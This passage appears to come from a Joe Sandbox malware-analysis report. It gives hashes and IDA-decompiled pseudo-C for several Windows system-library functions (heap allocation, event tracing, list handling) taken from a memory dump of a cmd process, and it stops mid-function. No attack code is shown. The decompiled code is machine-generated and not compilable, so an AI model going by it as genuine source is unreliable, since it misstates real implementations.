API String ID:
Opcode ID: 6d2c65d17285518dcddf31a4ac2c0f999b6f37878c68c83a02ef9659c4b51938
Instruction ID: afe7de4ca4f9be0926fdfe8ddd98835897a25239d92fa78de0da146142ea901f
Opcode Fuzzy Hash: 6d2c65d17285518dcddf31a4ac2c0f999b6f37878c68c83a02ef9659c4b51938
Instruction Fuzzy Hash: 4531CE31202B04CFD722CF28C944B9AB7E5FF88714F18856DE5968BB90EB75A805CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03746C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E03746C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E036E7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x37b7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L036E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0370F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E036E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03709AE0();
						_t23 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x03746c0a
0x03746c0f
0x03746c10
0x03746c13
0x03746c15
0x03746c19
0x03746c1c
0x03746c21
0x03746c28
0x03746c3a
0x03746c2a
0x03746c33
0x03746c33
0x03746c3f
0x03746c48
0x03746c4d
0x03746c60
0x03746c65
0x03746c69
0x03746c73
0x03746c79
0x03746c7f
0x03746c86
0x03746c90
0x03746c94
0x03746ca6
0x03746cb2
0x03746cbd
0x03746cbd
0x03746cc3
0x03746cc7
0x03746ccb
0x03746cd0
0x03746cd1
0x03746ce2
0x03746ce2
0x03746c69
0x03746ced

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f76a72b70f15371f0d83576a5be3a411c18ba7bd302bc9e2aa71ec69aa1ab0
Instruction ID: 8e35ce823def4a9dcdd0e87c35a2a2727c1f8b36da2bc976b233bdbd358931e9
Opcode Fuzzy Hash: e9f76a72b70f15371f0d83576a5be3a411c18ba7bd302bc9e2aa71ec69aa1ab0
Instruction Fuzzy Hash: 2C219AB5A00644ABC715DB68D880F2AB7F8FF49700F144069F904DB791D734E950CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 037090AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E037090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0371D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E036FE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L036E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0370F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E036FA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x037090af
0x037090b8
0x037090bb
0x037090bf
0x037090c2
0x037090c2
0x037090c8
0x037090cb
0x037090cd
0x037414d7
0x037414eb
0x037414eb
0x00000000
0x037414eb
0x037414db
0x037414e6
0x00000000
0x037414f2
0x037414e8
0x00000000
0x037414e8
0x037090d8
0x037090da
0x037090dd
0x037090e5
0x00000000
0x03709139
0x037090fa
0x037090fe
0x03709142
0x00000000
0x03709142
0x03709104
0x03709107
0x0370910b
0x03709110
0x03709118
0x03709147
0x03709148
0x0370914f
0x03709150
0x03709151
0x03709152
0x03709156
0x0370915d
0x03709160
0x03709168
0x0370916c
0x037091bc
0x037091be
0x00000000
0x037091be
0x0370916e
0x03709173
0x03709176
0x00000000
0x00000000
0x0370917c
0x03709180
0x037091b5
0x00000000
0x037091b5
0x03709182
0x03709185
0x03709189
0x00000000
0x00000000
0x0370918e
0x03709190
0x03709198
0x00000000
0x00000000
0x037091a0
0x00000000
0x037091ad
0x037091ad
0x037091b0
0x037091b1
0x00000000
0x03709185
0x0370911a
0x0370911c
0x0370911f
0x03709125
0x03709127
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: dc4c974f7a34053bffdac7d50ccc8dbef57e01b6b94a4e316800be5b4d900cf2
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: DF219275A00304EFDB20DF59C844EAAF7F8EB48310F14886AEA45AB251D370ED44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 036F3B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E036F3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x37b84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x37b84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x37b84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0370AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0370FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x37b84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x37b84c4; // 0x0
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x036f3b89
0x036f3b96
0x036f3ba1
0x036f3bab
0x036f3bb5
0x036f3bb9
0x03736298
0x036f3bbf
0x036f3bc2
0x036f3bc3
0x036f3bc9
0x036f3bca
0x036f3bcc
0x036f3bcd
0x036f3bd4
0x036f3bd6
0x036f3bdb
0x036f3bea
0x036f3bf7
0x036f3bfb
0x036f3bff
0x036f3c09
0x036f3c0a
0x036f3c0b
0x036f3c0f
0x036f3c14
0x036f3c18
0x036f3c18
0x036f3bfb
0x036f3c1b
0x036f3c30
0x036f3c30
0x036f3c3d

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15edea31665680e3d9c5961f8f86c5d91637009ae60cab33f3202b13fe7e77e2
Instruction ID: 79b4805b68dad685ba93ec10fb117e800012ba344be41e7b7274a37930544167
Opcode Fuzzy Hash: 15edea31665680e3d9c5961f8f86c5d91637009ae60cab33f3202b13fe7e77e2
Instruction Fuzzy Hash: 70219FB6A00208AFCB04EF98CD81F5AB7BDFB44708F254068EA08AB251D775ED15CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03746CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03746CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E036E7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E036E7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x36a5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E036FF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E036FF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03747016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L036E2400( &_v52);
								}
								_t21 = L036E2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x03746cfb
0x03746d00
0x03746d02
0x03746d06
0x03746d0a
0x03746d0e
0x03746d19
0x03746d2b
0x03746d1b
0x03746d24
0x03746d24
0x03746d33
0x03746d39
0x03746d46
0x03746d4f
0x03746d61
0x03746d51
0x03746d5a
0x03746d5a
0x03746d69
0x03746d6b
0x03746d6d
0x03746d6f
0x03746d6f
0x03746d74
0x03746d79
0x03746d7a
0x03746d7f
0x03746d82
0x03746d88
0x03746d89
0x03746d90
0x03746d94
0x03746da7
0x03746db1
0x03746db1
0x03746dbb
0x03746dbb
0x03746d90
0x03746d69
0x03746d46
0x03746dc6

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2ef911b721ea43b325d44ff33b1d1c9b18aaee0dffd294a44bbac9a268e043
Instruction ID: 991f7a9a9b03afa3ce30de65b7b58027f96d966800672a18577359aaf5abb44f
Opcode Fuzzy Hash: 5a2ef911b721ea43b325d44ff33b1d1c9b18aaee0dffd294a44bbac9a268e043
Instruction Fuzzy Hash: 9121D7725057449FCB11EF69C944F67B7ECEF82740F08055AF940EB251EB34E908CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 0379070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0379070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E037907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0378AFDE( &_v8,  &_v12);
					E03791293(_t38, _v28, _t60);
					if(E036E7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E037814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0379071b
0x03790724
0x03790734
0x03790738
0x0379074b
0x0379074b
0x03790753
0x03790753
0x03790759
0x0379075d
0x03790774
0x03790779
0x0379077d
0x03790789
0x03790795
0x037907a7
0x03790797
0x037907a0
0x037907a0
0x037907af
0x037907c4
0x037907cd
0x037907cd
0x037907af
0x037907dc

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 56a8410187423efb3250bbb4040d8f278b6a845c33c4599cbb2cf5f15ce0cd96
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 2121F5362042049FDB05DF18DC84A6ABBA5EFC4350F08866EF9558F381D630D919CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03792EF7 Relevance: .1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 35%

			E03792EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x37bd360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E0370D0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E0370D0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E036E2280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x37bb1e0();
						 *( *(_t106 + 0x30) ^  *0x37b6110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x37bb1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x37b6110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E036DFFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E0370B640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x36aac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x36aac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}

0x03792efc
0x03792efd
0x03792eff
0x03792f03
0x03792f0a
0x03792f0c
0x03792f15
0x03792fba
0x03792fbb
0x03792fc5
0x03792fcd
0x03792fcf
0x03792fd3
0x03792fd4
0x03792fd5
0x03792fd7
0x03792fda
0x03792fdb
0x03792fdd
0x03792fe0
0x03792fe2
0x03792ffc
0x03792fe4
0x03792fe4
0x03792fea
0x03792fed
0x03792fef
0x03792ff6
0x03792ff1
0x03792ff1
0x03792ff1
0x03792fef
0x03792fff
0x03793001
0x0379301b
0x03793003
0x03793003
0x0379300e
0x03793015
0x03793010
0x03793010
0x03793010
0x03793010
0x0379300e
0x0379302c
0x03793035
0x0379303c
0x03793046
0x0379304e
0x03793056
0x0379305a
0x0379305e
0x03793063
0x03793067
0x0379306b
0x0379306f
0x03793072
0x037930af
0x037930b5
0x037930c1
0x037930c9
0x037930c9
0x037930c9
0x00000000
0x03793074
0x03793081
0x03793089
0x0379308b
0x0379308d
0x03793093
0x0379309a
0x037930ce
0x037930d1
0x037930d5
0x037930d5
0x037930d5
0x0379308d
0x037930db
0x037930e6
0x037930e7
0x037930e8
0x037930e9
0x037930f3
0x03792f27
0x03792f29
0x03792f2b
0x03792f2d
0x03792f36
0x03792f3d
0x03792f4c
0x03792f58
0x03792fad
0x03792fb7
0x03792fb7

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecfc30afeb5b535378e5639d5f0caa45c99738705b847d8f93c0eda4a2e4fd8
Instruction ID: aaea0b374953e3db6b02b464b7c1de57579d4bd56cd3beacdd263b7f679fdce9
Opcode Fuzzy Hash: fecfc30afeb5b535378e5639d5f0caa45c99738705b847d8f93c0eda4a2e4fd8
Instruction Fuzzy Hash: 1721EBB12141505FE784CB5EC8A05B6BFE5EFC711234A82E7D88ACB343C5249407CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03791FF1 Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E03791FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x37b6110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x37b6110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x37b6110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x37b6110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}

0x03791ff9
0x03791ffc
0x03792001
0x0379200d
0x0379201b
0x03792028
0x0379202e
0x03792035
0x03792038
0x0379204c
0x03792052
0x03792053
0x03792054
0x03792055
0x03792069
0x0379206c
0x0379206e
0x03792079
0x03792087
0x0379209c
0x0379209c
0x0379202a
0x0379202a
0x0379202a
0x037920a5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0092e76f50cae1c6c93668f480fe7d5626ab6fc2b98c8a2f7b3f6541581b77
Instruction ID: 1378f49d78a4a0a625503f84e0f5ee4c5d6334a51ceae6517ac2fe72f2cd6e1b
Opcode Fuzzy Hash: af0092e76f50cae1c6c93668f480fe7d5626ab6fc2b98c8a2f7b3f6541581b77
Instruction Fuzzy Hash: A821A233A104199BDB18DF7CD805566F7EAEF8C21032A867BD912DB265EA70BD11C680

Uniqueness

Uniqueness Score: -1.00%

Function 03747794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E03747794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x37b7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0370F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E036E7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03709AE0();
					_t24 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x03747799
0x0374779a
0x0374779b
0x037477a3
0x037477ab
0x037477ae
0x037477b1
0x037477b1
0x037477bf
0x037477c4
0x037477c8
0x037477ce
0x037477d4
0x037477e0
0x037477e0
0x037477d6
0x037477d6
0x037477de
0x00000000
0x00000000
0x037477de
0x037477e5
0x037477f0
0x037477f3
0x037477f6
0x037477fd
0x03747800
0x0374780c
0x03747818
0x0374782b
0x0374781a
0x03747823
0x03747823
0x03747830
0x03747831
0x03747838
0x0374783d
0x0374783e
0x0374784f
0x0374784f
0x0374785a

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ea9c86f73cab7e475c8432bd8961d87301bd256baee8ab76efe2295b087bba
Instruction ID: 8b9a6d42c0c2ec2473c8b1da4660b0c18071a65a99f348e7dacf899c0336de29
Opcode Fuzzy Hash: 24ea9c86f73cab7e475c8432bd8961d87301bd256baee8ab76efe2295b087bba
Instruction Fuzzy Hash: 6D21CD72900644ABC729DF69D880E6BB7ACEF88340F14056DE50ADB690E734E900CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 036EAE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E036EAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
